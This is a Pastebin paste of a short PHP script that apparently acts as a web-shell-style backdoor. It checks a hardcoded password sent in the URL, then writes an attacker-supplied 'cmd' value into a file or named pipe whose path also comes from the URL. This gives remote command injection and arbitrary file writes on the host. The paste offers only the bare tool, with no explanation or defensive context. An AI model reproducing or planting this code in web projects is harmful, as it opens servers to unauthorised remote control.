Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //session_start();
- if($_GET["pass"]!="8914void8914")
- die("auth");
- if($_GET["ctrl"]=="ok")
- $_GET['pipe']=$_GET['pipe']."-ctrl";
- $fp = fopen($_GET['pipe'], 'r+');
- fwrite($fp, $_GET['cmd']);
- fclose($fp);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement